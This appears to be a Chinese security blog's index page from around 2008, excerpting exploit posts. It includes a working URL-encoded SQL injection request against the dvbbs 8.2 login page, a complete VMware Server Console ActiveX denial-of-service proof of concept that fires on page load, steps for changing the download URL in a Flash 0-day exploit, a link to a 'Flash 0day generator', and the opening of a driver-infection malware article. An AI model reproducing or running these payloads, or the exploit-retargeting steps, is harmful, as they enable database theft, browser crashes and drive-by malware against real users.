MMS安全测试工具

作者:zwell
来源:NOSEC

用来做彩信安全测试的,发出来大家玩一玩。不知道怎么用的,或者不知道如何用GPRS MODEM拨号的朋友就不用下载了。这是针对MM1接口非常低层的测试工具。想知道怎么免费发彩信吗?呵呵,慢慢研究吧!
阅读全文 »

Tags: ,

dvbbs 8.2 SQL注射漏洞分析

来源:80sec

漏洞公告:http://seclists.org/bugtraq/2008/May/0330.html

利用方式:一个典型的sql注射漏洞,按照公告里说的用

password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271

就可触发.
阅读全文 »

Tags: , ,

dvbbs8.2(access/sql)version login.asp remote sql injection

来源:seclists

email:
hackerb_at_hotmail.com

Subject:
dvbbs8.2(access/sql)version login.asp remote sql injection

danger level:
critical/High

info:
dvbbs is prone to multiple sql injection security flaw
阅读全文 »

Tags: , ,

FLASH 0DAY 详细分析和总结

作者:racle
来源:天阳网络技术论坛

手记:
——————————————
首先必须感谢的X.G.C.Team的OPEN在几个关键的地方给予我分析,解决办法的帮助.与及咱们论坛好几位兄弟的帮助.最终我才把这个东西给分析出来..
——————————————
最近FLASH出了几个0DAY,论坛也帖了相关的新闻信息(请见:http://bbs.tian6.com/viewthread.php?tid=4434&extra=&page=1).我也约在5天前开始对此进行研究.我记得同时间邪恶八进制也有人开始同样的研究.到目前为止,该0DAY可以影响到90.115这个版本.而邪八那边的研究,先在两天前宣布成功完成.这又给我带来不小的压力..
阅读全文 »

Tags: , , ,

关于FLASH ODAY的修改方法

鬼仔注:昨天发了open写的Flash 0day生成器,当时忘了说了,是在赏月那里看到的。结果今天open跟我说发出来之后,好多人找他问修改方法,所以就有了现在这篇文章。

来源:open’s blog

鬼仔网站上公布了生成器。在这我就粗略说一下
把那个ODAY的网址改为明文的方法。
以我BLOG所上传的样本为例:
定位到文件的FD位置后。把它改为51
之后的下载网址你想改啥就啥
阅读全文 »

Tags: , , ,

Flash 0day生成器

鬼仔:也就是这个了,open写的。

下载地址:flash0day.rar

Tags: , , , ,

VMware Server Console ActiveX DOS POC

<html>
<title>VMware Server Console ActiveX DOS POC</title>
<!--
Author:Shennan Wang
blog:http://hi.baidu.com/nansec
stuff:http://www.d4rkn3t.cn
thanks:
Robinh00d,ayarei,void
-->
<head>
<script language="JavaScript">
    function test() {
var bufA = "2";
var bufB = "0";
var bufC = "0";
var bufD = "8";
for (i = 0; i < 2008; i++) { 
bufA += bufA;}
for (i = 0; i < 2008; i++){
bufB += bufB;}
for (i = 0; i < 2008; i++){
bufC += bufC;}
for (i = 0; i < 2008; i++){
bufD += bufD;}  
nansec.DoModalDirect(bufA,bufB,bufC,bufD);}
</script>
</head>
 <body onload="JavaScript: return test();">
<object classid="clsid:D2C53A29-B43A-4367-B808-52CE785BBF36" id="nansec">
</object>
 </body>
</html>

# milw0rm.com [2008-05-28]
Tags: , ,

完整的驱动感染.code.编译通过

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:sudami

/*
* Module: InfectDriver.c
*
* Author : 老Y (源自kanxue,不过老Y放的code不完整,需要自己补充)
* Fixer : sudami [[email protected]]
* Time : 08/05/28
*
* Comment:
*
* 半年前一大牛在kanxue进行“驱动感染”扫盲,偶当时没搞明白.半年后突然想起来,于是
* 尝试学习下.由于偶太菜,弄了几个小半天.终于调试成功. 关键点在于计算驱动自身的
阅读全文 »

Tags: ,